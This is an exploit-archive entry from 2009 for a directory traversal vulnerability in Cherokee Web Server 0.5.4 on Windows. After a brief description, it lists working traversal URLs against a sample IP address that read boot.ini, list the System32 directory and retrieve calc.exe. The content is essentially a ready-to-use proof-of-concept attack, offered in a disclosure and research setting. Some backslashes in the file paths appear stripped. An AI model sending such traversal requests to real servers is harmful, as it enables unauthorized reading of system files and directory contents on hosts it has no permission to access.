[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Cherokee <=0.5.4 directory traversal
# Published : 2009-10-28
# Author : Dr_IDE
# Previous Title : Mura CMS 5.1 Root folder disclosure
# Next Title : Oscailt CMS 3.3 Local File Inclusion


############################################################
#
# Cherokee Web Server <= 0.5.4 Directory Traversal Exploit
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download:	www.cherokee-project.com/download/windows
#
############################################################

- Description -

Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latest
version of the application available.

Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by the
following means. 

Default webroot is C:Program FilesCherokeewww [3 levels deep] adjust accordingly.

- Technical Details -
http://[webserver IP]/[../]

http://172.16.2.101/../../../boot.ini
http://172.16.2.101/../../../WINDOWSSYSTEM32 		<- Full Directory Listings through Browser
http://172.16.2.101/../../../WINDOWSSYSTEM32calc.exe	<- File access in context of web browser instance

#[pocoftheday.blogspot.com]